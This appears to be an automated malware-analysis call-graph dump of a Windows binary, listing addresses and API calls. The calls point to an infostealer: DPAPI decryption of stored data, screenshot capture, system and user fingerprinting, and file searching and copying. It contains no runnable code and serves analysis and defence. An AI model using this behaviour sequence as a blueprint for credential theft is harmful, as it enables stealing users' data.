40f0f0 27 API calls 25312->25313 25314 40d55e 25313->25314 25315 403100 27 API calls 25314->25315 25316 40d56a 25315->25316 25317 40f0f0 27 API calls 25316->25317 25318 40d5ae 25317->25318 25319 40f0f0 27 API calls 25318->25319 25320 40d5f4 25319->25320 25321 403100 27 API calls 25320->25321 25322 40d600 25321->25322 25323 40f0f0 27 API calls 25322->25323 25324 40d642 25323->25324 25325 40f0f0 27 API calls 25324->25325 25326 40d68e 25325->25326 25327 403100 27 API calls 25326->25327 25328 40d69a 25327->25328 25329 40f0f0 27 API calls 25328->25329 25330 40d6de 25329->25330 25331 40f0f0 27 API calls 25330->25331 25332 40d724 25331->25332 25333 403100 27 API calls 25332->25333 25334 40d730 25333->25334 25335 40f0f0 27 API calls 25334->25335 25336 40d772 25335->25336 25337 40f0f0 27 API calls 25336->25337 25338 40d7be 25337->25338 25339 403100 27 API calls 25338->25339 25340 40d7ca 25339->25340 25341 40f0f0 27 API calls 25340->25341 25342 40d80e 25341->25342 25343 40f0f0 27 API calls 25342->25343 25344 40d854 25343->25344 25345 403100 27 API calls 25344->25345 25346 40d860 25345->25346 25347 40f0f0 27 API calls 25346->25347 25348 40d8a2 25347->25348 25349 40f0f0 27 API calls 25348->25349 25350 40d8ee 25349->25350 25351 403100 27 API calls 25350->25351 25352 40d8fa 25351->25352 25394 41d325 14 API calls _free 25353->25394 25355 41d3a8 25356 41d3b6 _strftime 11 API calls 25355->25356 25357 41d3b5 25356->25357 25359 40f341 25358->25359 25359->25359 25395 4021e0 25359->25395 25361 40f365 25363 40f38b __InternalCxxFrameHandler 25361->25363 25412 40fa50 27 API calls __fread_nolock 25361->25412 25366 40f3e6 __InternalCxxFrameHandler 25363->25366 25413 40fa50 27 API calls __fread_nolock 25363->25413 25365 40f437 25365->25200 25366->25200 25368 40f5b5 25367->25368 25368->25368 25369 40f5d0 __InternalCxxFrameHandler 25368->25369 25416 40fa50 27 API calls __fread_nolock 25368->25416 25369->25208 25374 40f101 __InternalCxxFrameHandler 25371->25374 25376 40f12d 25371->25376 25372 40f21e 25418 4021d0 27 API calls 2 library calls 25372->25418 25374->25234 25375 41d399 25 API calls 25379 40f228 25375->25379 25376->25372 25377 40f219 25376->25377 25380 40f181 25376->25380 25381 40f1a8 25376->25381 25417 4011a0 16 API calls 2 library calls 25377->25417 25380->25377 25382 40f18c 25380->25382 25384 416347 16 API calls 25381->25384 25385 40f192 __fread_nolock 25381->25385 25383 416347 16 API calls 25382->25383 25383->25385 25384->25385 25385->25375 25386 40f202 25385->25386 25386->25234 25388 403117 ___scrt_fastfail 25387->25388 25388->25388 25389 403190 SHFileOperationW Sleep 25388->25389 25390 4031ec 25389->25390 25391 41d399 25 API calls 25390->25391 25392 403272 25390->25392 25393 403288 25391->25393 25392->25238 25394->25355 25401 4021f9 25395->25401 25404 402271 __fread_nolock 25395->25404 25396 41d399 25 API calls 25397 40237c 25396->25397 25414 4021d0 27 API calls 2 library calls 25397->25414 25399 402381 25415 4011a0 16 API calls 2 library calls 25399->25415 25401->25397 25401->25399 25402 402260 25401->25402 25403 402287 25401->25403 25401->25404 25402->25399 25406 416347 16 API calls 25402->25406 25403->25404 25405 416347 16 API calls 25403->25405 25404->25361 25404->25396 25411 4022e4 __fread_nolock 25404->25411 25405->25404 25406->25404 25407 402386 25408 4023c0 25407->25408 25409 41d399 25 API calls 25407->25409 25408->25361 25410 4023e6 25409->25410 25411->25361 25412->25363 25413->25365 25414->25399 25415->25407 25416->25369 25417->25372 25418->25385 25419 40a6e3 GetFileAttributesW 25420 40a6f1 25419->25420 25421 40a71a 25419->25421 25420->25421 25435 40a70b 25420->25435 25453 41f0f7 25420->25453 25422 40a735 GetFileAttributesW 25421->25422 25423 40a77d GetSystemInfo 25421->25423 25422->25423 25426 40a743 25422->25426 25424 40aa11 25423->25424 25425 40a797 KiUserCallbackDispatcher 25423->25425 25425->25424 25428 40a7aa GlobalMemoryStatusEx 25425->25428 25426->25423 25434 41f0f7 15 API calls 25426->25434 25442 40a75d 25426->25442 25427 41da01 34 API calls 25427->25421 25433 40a7d2 ___scrt_fastfail 25428->25433 25432 41da01 34 API calls 25436 40a76c 25432->25436 25433->25424 25438 40a808 RegOpenKeyExW 25433->25438 25437 40a757 25434->25437 25435->25427 25436->25423 25457 41da22 34 API calls _unexpected 25437->25457 25440 40a847 RegCloseKey 25438->25440 25441 40a82a RegQueryValueExW 25438->25441 25443 40a870 25440->25443 25441->25440 25442->25432 25443->25443 25444 40f0f0 27 API calls 25443->25444 25445 40a88f 25444->25445 25458 40fbd0 27 API calls __fread_nolock 25445->25458 25447 40a8cf 25451 40a8f3 25447->25451 25459 40fdb0 27 API calls __fread_nolock 25447->25459 25449 40a9ee 25450 41d399 25 API calls 25452 40aa29 25450->25452 25451->25449 25451->25450 25460 41f074 25453->25460 25455 40a705 25456 41da22 34 API calls _unexpected 25455->25456 25456->25435 25457->25442 25458->25447 25459->25447 25461 41f083 25460->25461 25462 41f098 25460->25462 25468 4229da 14 API calls _free 25461->25468 25467 41f093 __alldvrm 25462->25467 25470 42975b 6 API calls _unexpected 25462->25470 25464 41f088 25469 41d389 14 API calls __strnicoll 25464->25469 25467->25455 25468->25464 25469->25467 25470->25467 25471 404945 25472 40495a 25471->25472 25473 40f0f0 27 API calls 25472->25473 25474 404986 25473->25474 25503 40f020 25474->25503 25476 404998 25517 402680 25476->25517 25479 406798 25551 401f20 25479->25551 25481 4067a7 25559 40eee0 27 API calls 25481->25559 25482 4049a7 25550 40eee0 27 API calls 25482->25550 25484 4067e6 25485 401f20 25 API calls 25484->25485 25486 403c01 25485->25486 25560 40eee0 27 API calls 25486->25560 25488 406834 25489 401f20 25 API calls 25488->25489 25492 403800 25489->25492 25491 406879 25493 406885 25491->25493 25494 401f20 25 API calls 25491->25494 25561 40eee0 27 API calls 25492->25561 25562 414d60 25493->25562 25494->25493 25496 4068bb 25574 40eee0 27 API calls 25496->25574 25498 4068c3 25499 401f20 25 API calls 25498->25499 25500 4068cb 25499->25500 25501 401f20 25 API calls 25500->25501 25502 4068d3 25501->25502 25506 40f041 25503->25506 25504 40f048 25504->25476 25505 40f0d9 25575 4011a0 16 API calls 2 library calls 25505->25575 25506->25504 25506->25505 25507 40f0a3 25506->25507 25508 40f084 25506->25508 25514 416347 16 API calls 25507->25514 25516 40f098 __fread_nolock 25507->25516 25508->25505 25511 40f08b 25508->25511 25510 40f091 25512 41d399 25 API calls 25510->25512 25510->25516 25513 416347 16 API calls 25511->25513 25515 40f0e3 25512->25515 25513->25510 25514->25516 25516->25476 25518 4021e0 27 API calls 25517->25518 25519 40270b 25518->25519 25520 40272b __InternalCxxFrameHandler 25519->25520 25576 40fa50 27 API calls __fread_nolock 25519->25576 25523 402790 __InternalCxxFrameHandler 25520->25523 25577 40fa50 27 API calls __fread_nolock 25520->25577 25524 40280f FindFirstFileW 25523->25524 25525 402805 25523->25525 25526 402a07 25523->25526 25535 402850 25524->25535 25525->25524 25527 41d399 25 API calls 25526->25527 25536 40292c 25527->25536 25528 40f0f0 27 API calls 25528->25535 25529 41d399 25 API calls 25530 402a11 25529->25530 25579 401fd0 25530->25579 25533 402907 FindNextFileW 25534 40291d FindClose 25533->25534 25533->25535 25534->25536 25535->25528 25535->25533 25535->25536 25578 40f650 27 API calls 25535->25578 25536->25529 25538 4029e8 25536->25538 25537 402bdf 25537->25482 25538->25482 25539 41f0f7 15 API calls 25548 402a77 __InternalCxxFrameHandler 25539->25548 25540 41da01 34 API calls 25540->25548 25541 402bb9 25541->25537 25542 41d399 25 API calls 25541->25542 25544 402c01 25542->25544 25596 40f230 16 API calls 25544->25596 25545 401fd0 27 API calls 25545->25548 25548->25539 25548->25540 25548->25541 25548->25544 25548->25545 25594 41da22 34 API calls _unexpected 25548->25594 25595 40f890 27 API calls 2 library calls 25548->25595 25550->25479 25552 401f2b 25551->25552 25553 401f4c 25551->25553 25552->25553 25554 41d399 25 API calls 25552->25554 25553->25481 25556 401f72 25554->25556 25555 401fa6 25555->25481 25556->25555 25557 41d399 25 API calls 25556->25557 25558 401fca 25557->25558 25559->25484 25560->25488 25561->25491 25563 414d67 25562->25563 25564 414d78 25562->25564 25563->25496 25565 414d7d 25564->25565 25566 414da2 25564->25566 25599 414a90 WriteFile 25564->25599 25565->25496 25567 414dbc 25566->25567 25569 414db5 UnmapViewOfFile 25566->25569 25570 414dd1 25567->25570 25571 414dca CloseHandle 25567->25571 25569->25567 25572 414de5 CloseHandle 25570->25572 25573 414dec 25570->25573 25571->25570 25572->25573 25573->25496 25574->25498 25575->25510 25576->25520 25577->25523 25578->25535 25583 401fe5 __InternalCxxFrameHandler 25579->25583 25584 40200c 25579->25584 25580 4020e6 25597 4021d0 27 API calls 2 library calls 25580->25597 25582 4020eb 25598 4011a0 16 API calls 2 library calls 25582->25598 25583->25548 25584->25580 25586 402055 25584->25586 25587 402078 25584->25587 25586->25582 25589 416347 16 API calls 25586->25589 25590 416347 16 API calls 25587->25590 25591 402066 __fread_nolock 25587->25591 25588 4020f0 25589->25591 25590->25591 25592 41d399 25 API calls 25591->25592 25593 4020c9 25591->25593 25592->25580 25593->25548 25594->25548 25595->25548 25597->25582 25598->25588 25599->25566 25600 427907 25617 424dc7 25600->25617 25602 427915 25603 427924 25602->25603 25604 427945 25602->25604 25635 4229da 14 API calls _free 25603->25635 25606 427953 25604->25606 25607 427960 25604->25607 25636 4229da 14 API calls _free 25606->25636 25611 427973 25607->25611 25637 427bba 16 API calls __wsopen_s 25607->25637 25612 427929 25611->25612 25613 42ee3b __fread_nolock 14 API calls 25611->25613 25614 4279e5 25611->25614 25616 4279f2 25611->25616 25613->25614 25614->25616 25638 42eec3 15 API calls 2 library calls 25614->25638 25624 427aec 25616->25624 25618 424dd3 25617->25618 25619 424de8 25617->25619 25639 4229da 14 API calls _free 25618->25639 25619->25602 25621 424dd8 25640 41d389 14 API calls __strnicoll 25621->25640 25623 424de3 25623->25602 25625 424dc7 __fread_nolock 14 API calls 25624->25625 25626 427afb 25625->25626 25627 427ba1 25626->25627 25628 427b0e 25626->25628 25629 42751e __wsopen_s 59 API calls 25627->25629 25630 427b2f 25628->25630 25633 427b52 25628->25633 25632 427b3c 25629->25632 25631 42751e __wsopen_s 59 API calls 25630->25631 25631->25632 25632->25612 25633->25632 25641 4286e2 25633->25641 25635->25612 25636->25612 25637->25611 25638->25616 25639->25621 25640->25623 25644 428476 25641->25644 25645 428482 ___scrt_is_nonwritable_in_current_image 25644->25645 25646 4284a2 25645->25646 25647 42848a 25645->25647 25649 428553 25646->25649 25653 4284d7 25646->25653 25670 4229c7 14 API calls _free 25647->25670 25675 4229c7 14 API calls _free 25649->25675 25651 42848f 25671 4229da 14 API calls _free 25651->25671 25652 428558 25676 4229da 14 API calls _free 25652->25676 25669 42c65f EnterCriticalSection 25653->25669 25657 428560 25677 41d389 14 API calls __strnicoll 25657->25677 25658 4284dd 25660 428501 25658->25660 25661 428516 25658->25661 25672 4229da 14 API calls _free 25660->25672 25664 4285d9 __fread_nolock 16 API calls 25661->25664 25662 428497 25662->25632 25666 428511 25664->25666 25665 428506 25673 4229c7 14 API calls _free 25665->25673 25674 42854b LeaveCriticalSection __wsopen_s 25666->25674 25669->25658 25670->25651 25671->25662 25672->25665 25673->25666 25674->25662 25675->25652 25676->25657 25677->25662 25678 428384 25679 428390 ___scrt_is_nonwritable_in_current_image 25678->25679 25680 4283b0 25679->25680 25681 428398 25679->25681 25683 42844b 25680->25683 25688 4283e2 25680->25688 25712 4229c7 14 API calls _free 25681->25712 25717 4229c7 14 API calls _free 25683->25717 25684 42839d 25713 4229da 14 API calls _free 25684->25713 25687 428450 25718 4229da 14 API calls _free 25687->25718 25703 42c65f EnterCriticalSection 25688->25703 25691 428458 25719 41d389 14 API calls __strnicoll 25691->25719 25692 4283e8 25694 428404 25692->25694 25695 428419 25692->25695 25714 4229da 14 API calls _free 25694->25714 25704 428582 25695->25704 25698 428414 25716 428443 LeaveCriticalSection __wsopen_s 25698->25716 25699 428409 25715 4229c7 14 API calls _free 25699->25715 25702 4283a5 25703->25692 25705 42c8db __wsopen_s 14 API calls 25704->25705 25706 428591 25705->25706 25707 4285a7 25706->25707 25708 428597 25706->25708 25720 428655 SetFilePointerEx 25707->25720 25728 4229da 14 API calls _free 25708->25728 25711 42859c 25711->25698 25712->25684 25713->25702 25714->25699 25715->25698 25716->25702 25717->25687 25718->25691 25719->25702 25721 428684 SetFilePointerEx 25720->25721 25722 428675 GetLastError 25720->25722 25721->25722 25724 4286a4 25721->25724 25729 4229a4 14 API calls 2 library calls 25722->25729 25725 428681 25724->25725 25726 4286b5 SetFilePointerEx 25724->25726 25725->25711 25730 4229da 14 API calls _free 25726->25730 25728->25711 25729->25725 25730->25725 25731 42a488 25732 42a495 25731->25732 25736 42a4ad 25731->25736 25781 4229da 14 API calls _free 25732->25781 25734 42a49a 25782 41d389 14 API calls __strnicoll 25734->25782 25737 42a4a5 25736->25737 25738 42a50c 25736->25738 25783 42eec3 15 API calls 2 library calls 25736->25783 25740 424dc7 __fread_nolock 14 API calls 25738->25740 25741 42a524 25740->25741 25751 428c1c 25741->25751 25744 424dc7 __fread_nolock 14 API calls 25745 42a558 25744->25745 25745->25737 25746 424dc7 __fread_nolock 14 API calls 25745->25746 25747 42a566 25746->25747 25747->25737 25748 424dc7 __fread_nolock 14 API calls 25747->25748 25749 42a576 25748->25749 25750 424dc7 __fread_nolock 14 API calls 25749->25750 25750->25737 25752 428c28 ___scrt_is_nonwritable_in_current_image 25751->25752 25753 428c30 25752->25753 25754 428c48 25752->25754 25785 4229c7 14 API calls _free 25753->25785 25755 428d05 25754->25755 25759 428c7e 25754->25759 25792 4229c7 14 API calls _free 25755->25792 25758 428c35 25786 4229da 14 API calls _free 25758->25786 25762 428c87 25759->25762 25763 428c9c 25759->25763 25760 428d0a 25793 4229da 14 API calls _free 25760->25793 25787 4229c7 14 API calls _free 25762->25787 25784 42c65f EnterCriticalSection 25763->25784 25767 428c94 25794 41d389 14 API calls __strnicoll 25767->25794 25768 428c8c 25788 4229da 14 API calls _free 25768->25788 25769 428ca2 25772 428cd3 25769->25772 25773 428cbe 25769->25773 25770 428c3d 25770->25737 25770->25744 25775 428d30 __fread_nolock 26 API calls 25772->25775 25789 4229da 14 API calls _free 25773->25789 25777 428cce 25775->25777 25791 428cfd LeaveCriticalSection __wsopen_s 25777->25791 25778 428cc3 25790 4229c7 14 API calls _free 25778->25790 25781->25734 25782->25737 25783->25738 25784->25769 25785->25758 25786->25770 25787->25768 25788->25767 25789->25778 25790->25777 25791->25770 25792->25760 25793->25767 25794->25770 25795 403b6b 25796 403b80 25795->25796 25797 40f0f0 27 API calls 25796->25797 25798 403bac 25797->25798 25799 40f020 27 API calls 25798->25799 25800 403bbe 25799->25800 25801 402680 43 API calls 25800->25801 25804 403bcd 25801->25804 25803 406834 25805 401f20 25 API calls 25803->25805 25819 40eee0 27 API calls 25804->25819 25811 403800 25805->25811 25807 406879 25808 406885 25807->25808 25809 401f20 25 API calls 25807->25809 25810 414d60 4 API calls 25808->25810 25809->25808 25812 4068bb 25810->25812 25820 40eee0 27 API calls 25811->25820 25821 40eee0 27 API calls 25812->25821 25814 4068c3 25815 401f20 25 API calls 25814->25815 25816 4068cb 25815->25816 25817 401f20 25 API calls 25816->25817 25818 4068d3 25817->25818 25819->25803 25820->25807 25821->25814 25822 4166cc 25823 4166d8 ___scrt_is_nonwritable_in_current_image 25822->25823 25848 41641e 25823->25848 25825 4166df 25826 416832 25825->25826 25836 416709 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 25825->25836 26014 416a61 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 25826->26014 25828 416839 26015 4231af 23 API calls CallUnexpected 25828->26015 25830 41683f 26016 423173 23 API calls CallUnexpected 25830->26016 25832 416847 25833 416728 25834 4167a9 25856 416b7b 25834->25856 25836->25833 25836->25834 26013 423189 34 API calls 3 library calls 25836->26013 25837 4167af 25860 415bf0 25837->25860 25849 416427 25848->25849 26017 416891 IsProcessorFeaturePresent 25849->26017 25851 416433 26018 417947 10 API calls 2 library calls 25851->26018 25853 416438 25854 41643c 25853->25854 26019 417966 7 API calls 2 library calls 25853->26019 25854->25825 26020 417b20 25856->26020 25859 416ba1 25859->25837 25861 415c00 __wsopen_s 25860->25861 26022 40aa30 25861->26022 25863 415c07 25864 4161f0 25863->25864 25867 415c1c ExpandEnvironmentStringsW 25863->25867 26501 402c10 31 API calls 25864->26501 25866 4161f5 ExitProcess 25868 415c53 CreateDirectoryW 25867->25868 25869 415c3b GetFileAttributesW 25867->25869 25871 40f2f0 27 API calls 25868->25871 25869->25868 25870 415c4b 25869->25870 25870->25864 25870->25868 25872 415c82 25871->25872 25873 415c8c ExpandEnvironmentStringsW 25872->25873 25874 401f20 25 API calls 25873->25874 25875 415c98 CreateDirectoryW 25874->25875 25876 40f2f0 27 API calls 25875->25876 25877 415cc9 25876->25877 25878 40f5a0 27 API calls 25877->25878 25879 415cd7 25878->25879 25880 415ce1 ExpandEnvironmentStringsW 25879->25880 25881 401f20 25 API calls 25880->25881 25882 415ced 25881->25882 25883 401f20 25 API calls 25882->25883 25884 415cf6 25883->25884 25885 40f2f0 27 API calls 25884->25885 25886 415d1b 25885->25886 25887 40f5a0 27 API calls 25886->25887 25888 415d29 25887->25888 25889 415d33 ExpandEnvironmentStringsW 25888->25889 25890 401f20 25 API calls 25889->25890 25891 415d3f 25890->25891 25892 401f20 25 API calls 25891->25892 25893 415d48 25892->25893 25894 40f2f0 27 API calls 25893->25894 25895 415d6d 25894->25895 25896 40f5a0 27 API calls 25895->25896 25897 415d7b 25896->25897 25898 415d85 ExpandEnvironmentStringsW 25897->25898 25899 401f20 25 API calls 25898->25899 25900 415d91 25899->25900 25901 401f20 25 API calls 25900->25901 25902 415d9a 25901->25902 25903 40f2f0 27 API calls 25902->25903 25904 415dbf 25903->25904 25905 40f5a0 27 API calls 25904->25905 25906 415dcd 25905->25906 25907 415dd7 ExpandEnvironmentStringsW 25906->25907 25908 401f20 25 API calls 25907->25908 25909 415de3 25908->25909 25910 401f20 25 API calls 25909->25910 25911 415dec 25910->25911 25912 40f2f0 27 API calls 25911->25912 25913 415e11 25912->25913 25914 40f5a0 27 API calls 25913->25914 25915 415e1f 25914->25915 25916 415e29 ExpandEnvironmentStringsW 25915->25916 25917 401f20 25 API calls 25916->25917 25918 415e35 25917->25918 25919 401f20 25 API calls 25918->25919 25920 415e3e 25919->25920 25921 40f2f0 27 API calls 25920->25921 25922 415e63 25921->25922 25923 40f5a0 27 API calls 25922->25923 25924 415e71 25923->25924 25925 415e7b ExpandEnvironmentStringsW 25924->25925 25926 401f20 25 API calls 25925->25926 25927 415e87 25926->25927 25928 401f20 25 API calls 25927->25928 25929 415e90 25928->25929 25930 40f2f0 27 API calls 25929->25930 25931 415eb5 25930->25931 25932 40f5a0 27 API calls 25931->25932 25933 415ec3 25932->25933 25934 415ecd ExpandEnvironmentStringsW 25933->25934 25935 401f20 25 API calls 25934->25935 25936 415ed9 25935->25936 25937 401f20 25 API calls 25936->25937 25938 415ee2 7 API calls 25937->25938 25939 40f2f0 27 API calls 25938->25939 25940 415f5b 25939->25940 25941 40f5a0 27 API calls 25940->25941 25942 415f69 25941->25942 25943 415f73 ExpandEnvironmentStringsW 25942->25943 25944 401f20 25 API calls 25943->25944 25945 415f7f 25944->25945 25946 401f20 25 API calls 25945->25946 25947 415f88 25946->25947 25948 40f2f0 27 API calls 25947->25948 25949 415fad 25948->25949 25950 40f5a0 27 API calls 25949->25950 25951 415fbb 25950->25951 25952 415fc5 ExpandEnvironmentStringsW 25951->25952 25953 401f20 25 API calls 25952->25953 25954 415fd1 25953->25954 25955 401f20 25 API calls 25954->25955 25956 415fda 25955->25956 25957 40f2f0 27 API calls 25956->25957 25958 415fff 25957->25958 25959 40f5a0 27 API calls 25958->25959 25960 41600d 25959->25960 25961 416017 ExpandEnvironmentStringsW 25960->25961 25962 401f20 25 API calls 25961->25962 25963 416023 25962->25963 25964 401f20 25 API calls 25963->25964 25965 41602c 25964->25965 25966 40f2f0 27 API calls 25965->25966 25967 416051 25966->25967 25968 40f5a0 27 API calls 25967->25968 25969 41605f 25968->25969 25970 416069 ExpandEnvironmentStringsW 25969->25970 25971 401f20 25 API calls 25970->25971 25972 416075 25971->25972 25973 401f20 25 API calls 25972->25973 25974 41607e 25973->25974 25975 40f2f0 27 API calls 25974->25975 25976 4160a3 25975->25976 25977 40f5a0 27 API calls 25976->25977 25978 4160b1 25977->25978 25979 4160bb ExpandEnvironmentStringsW 25978->25979 25980 401f20 25 API calls 25979->25980 25981 4160c7 25980->25981 25982 401f20 25 API calls 25981->25982 25983 4160d0 25982->25983 25984 40f2f0 27 API calls 25983->25984 25985 4160f5 25984->25985 25986 40f5a0 27 API calls 25985->25986 25987 416103 25986->25987 25988 41610d ExpandEnvironmentStringsW 25987->25988 25989 401f20 25 API calls 25988->25989 25990 416119 25989->25990 25991 401f20 25 API calls 25990->25991 25992 416122 25991->25992 25993 40f2f0 27 API calls 25992->25993 25994 416147 25993->25994 25995 40f5a0 27 API calls 25994->25995 25996 416155 25995->25996 25997 41615f ExpandEnvironmentStringsW 25996->25997 25998 401f20 25 API calls 25997->25998 25999 41616b 25998->25999 26000 401f20 25 API calls 25999->26000 26001 416174 7 API calls 26000->26001 26002 4161cd 26001->26002 26047 401eb0 26002->26047 26006 4161d7 26090 40db70 26006->26090 26013->25834 26014->25828 26015->25830 26016->25832 26017->25851 26018->25853 26019->25854 26021 416b8e GetStartupInfoW 26020->26021 26021->25859 26023 417b20 ___scrt_fastfail 26022->26023 26024 40aa6a RegOpenKeyExW 26023->26024 26025 40aaab RegCloseKey 26024->26025 26026 417b20 ___scrt_fastfail 26025->26026 26027 40aad0 RegOpenKeyExW 26026->26027 26028 40ab0b RegCloseKey GetUserNameW 26027->26028 26029 40ab4b 26028->26029 26030 41da01 34 API calls 26029->26030 26031 40ab50 26030->26031 26502 402a20 26031->26502 26033 40ab63 26516 402120 26033->26516 26036 40f2f0 27 API calls 26037 40aba5 ExpandEnvironmentStringsW 26036->26037 26039 40abfd CreateDirectoryW 26037->26039 26040 40ac2f 26039->26040 26041 41da01 34 API calls 26040->26041 26042 40ac34 Sleep 26041->26042 26043 40ac7a 26042->26043 26044 40acec 26043->26044 26045 41d399 25 API calls 26043->26045 26044->25863 26046 40ad12 26045->26046 26525 401540 26047->26525 26049 401ec7 26050 401540 100 API calls 26049->26050 26051 401edd 26050->26051 26052 401540 100 API calls 26051->26052 26053 401ef3 26052->26053 26054 401540 100 API calls 26053->26054 26055 401f09 26054->26055 26056 40ad20 26055->26056 26057 40f2f0 27 API calls 26056->26057 26058 40ad70 26057->26058 26059 40f5a0 27 API calls 26058->26059 26060 40ad86 ExpandEnvironmentStringsW 26059->26060 26062 40ade0 26060->26062 26063 40f2f0 27 API calls 26062->26063 26064 40ae50 26063->26064 26065 40f5a0 27 API calls 26064->26065 26066 40ae66 ExpandEnvironmentStringsW 26065->26066 26068 40aeba 26066->26068 26069 40af0e GetDesktopWindow 26068->26069 26070 40af04 26068->26070 26071 40b1ff 26068->26071 26072 40af40 GetWindowRect GetWindowDC GetDeviceCaps CreateCompatibleDC CreateDIBSection 26069->26072 26070->26069 26073 41d399 25 API calls 26071->26073 26074 40b00b DeleteDC DeleteDC GdiplusShutdown 26072->26074 26075 40b01c 7 API calls 26072->26075 26076 40b204 26073->26076 26074->26075 26077 40b073 GdipCreateBitmapFromHBITMAP 26075->26077 26078 40b09a 26075->26078 26079 40b0a1 GdipGetImageEncodersSize 26077->26079 26078->26079 26080 40b178 GdipSaveImageToFile 26079->26080 26081 40b0f9 26079->26081 26083 40b19d DeleteObject GdiplusShutdown CopyFileW 26080->26083 26082 41d3ea ___std_exception_copy 15 API calls 26081->26082 26084 40b0ff 26082->26084 26083->26006 26084->26080 26085 40b10b GdipGetImageEncoders 26084->26085 26089 40b11f 26085->26089 26087 41d1c2 ___vcrt_freefls@4 14 API calls 26088 40b175 26087->26088 26088->26080 26089->26087 26091 40dba6 ___scrt_fastfail __wsopen_s 26090->26091 26092 41f0f7 15 API calls 26091->26092 26093 40dc40 26092->26093 26094 41f0f7 15 API calls 26093->26094 26095 40dc50 26094->26095 26096 40f2f0 27 API calls 26095->26096 26097 40dc6e 26096->26097 26098 40f5a0 27 API calls 26097->26098 26099 40dc87 ExpandEnvironmentStringsW 26098->26099 26106 40dcaf 26099->26106 26101 40dd32 26102 40f2f0 27 API calls 26101->26102 26105 40dd51 26102->26105 26103 40e410 26104 41d399 25 API calls 26103->26104 26107 40e415 26104->26107 26108 40f5a0 27 API calls 26105->26108 26106->26101 26106->26103 26109 41d399 25 API calls 26107->26109 26501->25866 26503 401fd0 27 API calls 26502->26503 26511 402a77 __InternalCxxFrameHandler 26503->26511 26504 402bb9 26505 402bdf 26504->26505 26508 41d399 25 API calls 26504->26508 26505->26033 26506 41f0f7 15 API calls 26506->26511 26507 41da01 34 API calls 26507->26511 26510 402c01 26508->26510 26523 40f230 16 API calls 26510->26523 26511->26504 26511->26506 26511->26507 26511->26510 26512 401fd0 27 API calls 26511->26512 26521 41da22 34 API calls _unexpected 26511->26521 26522 40f890 27 API calls 2 library calls 26511->26522 26512->26511 26517 4021e0 27 API calls 26516->26517 26518 402166 26517->26518 26519 4021b7 26518->26519 26524 4023f0 27 API calls __fread_nolock 26518->26524 26519->26036 26521->26511 26522->26511 26524->26518 26613 433060 26525->26613 26531 4015b6 26532 402100 42 API calls 26531->26532 26612 401e66 26531->26612 26533 4015e1 26532->26533 26534 402100 42 API calls 26533->26534 26535 401602 26534->26535 26536 402100 42 API calls 26535->26536 26537 401623 26536->26537 26538 401634 CreateFileW 26537->26538 26537->26612 26539 40165b CloseHandle 26538->26539 26538->26612 26540 401672 CreateFileW 26539->26540 26539->26612 26541 401693 CloseHandle 26540->26541 26540->26612 26542 4016a4 CreateFileW 26541->26542 26541->26612 26543 4016c5 CloseHandle 26542->26543 26542->26612 26544 401810 26543->26544 26545 401728 26543->26545 26546 402120 27 API calls 26544->26546 26545->26544 26547 4017d4 26545->26547 26548 401768 26545->26548 26549 40179e 26545->26549 26550 40172f 26545->26550 26553 401839 26546->26553 26555 401fd0 27 API calls 26547->26555 26551 401fd0 27 API calls 26548->26551 26552 401fd0 27 API calls 26549->26552 26554 401fd0 27 API calls 26550->26554 26556 401777 26551->26556 26557 4017ad 26552->26557 26558 402120 27 API calls 26553->26558 26559 40173e 26554->26559 26560 4017e3 26555->26560 26562 401fd0 27 API calls 26556->26562 26563 401fd0 27 API calls 26557->26563 26564 401866 26558->26564 26565 401fd0 27 API calls 26559->26565 26561 401fd0 27 API calls 26560->26561 26566 4017f2 26561->26566 26567 401786 26562->26567 26568 4017bc 26563->26568 26569 402120 27 API calls 26564->26569 26570 40174d 26565->26570 26571 401fd0 27 API calls 26566->26571 26572 401fd0 27 API calls 26567->26572 26573 401fd0 27 API calls 26568->26573 26574 401893 26569->26574 26575 401fd0 27 API calls 26570->26575 26576 40175c 26571->26576 26572->26576 26573->26576 26577 402120 27 API calls 26574->26577 26575->26576 26579 401fd0 27 API calls 26576->26579 26578 4018c0 26577->26578 26580 402100 42 API calls 26578->26580 26579->26544 26581 40190d 26580->26581 26582 402100 42 API calls 26581->26582 26583 40195d 26582->26583 26584 402100 42 API calls 26583->26584 26585 4019ad 26584->26585 26586 402100 42 API calls 26585->26586 26587 4019fa 26586->26587 26588 402100 42 API calls 26587->26588 26589 401a4a 26588->26589 26590 402100 42 API calls 26589->26590 26591 401a9a 26590->26591 26592 402100 42 API calls 26591->26592 26593 401aea 26592->26593 26594 402100 42 API calls 26593->26594 26595 401b37 26594->26595 26646 41d1ab 26595->26646 26612->26049 26614 401562 ExpandEnvironmentStringsW 26613->26614 26615 402100 26614->26615 26672 4010b0 26615->26672 26618 401220 GetFileAttributesW 26619 4012ba 26618->26619 26620 40123f 26618->26620 26619->26531 26620->26619 26621 401243 CreateFileW 26620->26621 26621->26619 26622 401261 GetFileSizeEx 26621->26622 26623 4012b7 CloseHandle 26622->26623 26624 401277 26622->26624 26623->26619 26624->26623 26625 401521 26624->26625 26626 401287 CreateFileMappingW 26624->26626 26628 401525 CloseHandle 26625->26628 26629 401528 26625->26629 26626->26623 26627 40129e MapViewOfFile 26626->26627 26630 4012c4 26627->26630 26631 4012b4 CloseHandle 26627->26631 26628->26629 26629->26531 26711 4105c0 26630->26711 26631->26623 26633 40150d UnmapViewOfFile FindCloseChangeNotification 26633->26625 26634 4014f3 26749 410cb0 26634->26749 26636 4012eb 26636->26633 26636->26634 26636->26636 26637 41d3ea ___std_exception_copy 15 API calls 26636->26637 26638 401382 26637->26638 26638->26634 26639 401467 CryptUnprotectData 26638->26639 26645 4014ce __fread_nolock 26638->26645 26641 401498 __fread_nolock 26639->26641 26639->26645 26642 4014ba LocalFree 26641->26642 26641->26645 26643 4014c8 26642->26643 26642->26645 26644 41d3ea ___std_exception_copy 15 API calls 26643->26644 26644->26645 26746 41d1c2 26645->26746 26897 41d0f5 26646->26897 26673 4010cc 26672->26673 26676 41caf9 26673->26676 26679 419d8a 26676->26679 26678 4010d6 26678->26618 26680 419d96 26679->26680 26683 419dab 26679->26683 26702 4229da 14 API calls _free 26680->26702 26682 419d9b 26703 41d389 14 API calls __strnicoll 26682->26703 26701 419dc3 26683->26701 26704 4229da 14 API calls _free 26683->26704 26686 419da6 26686->26678 26687 419de1 26688 419de7 26687->26688 26689 419e01 26687->26689 26690 419e3f 26687->26690 26707 41d389 14 API calls __strnicoll 26688->26707 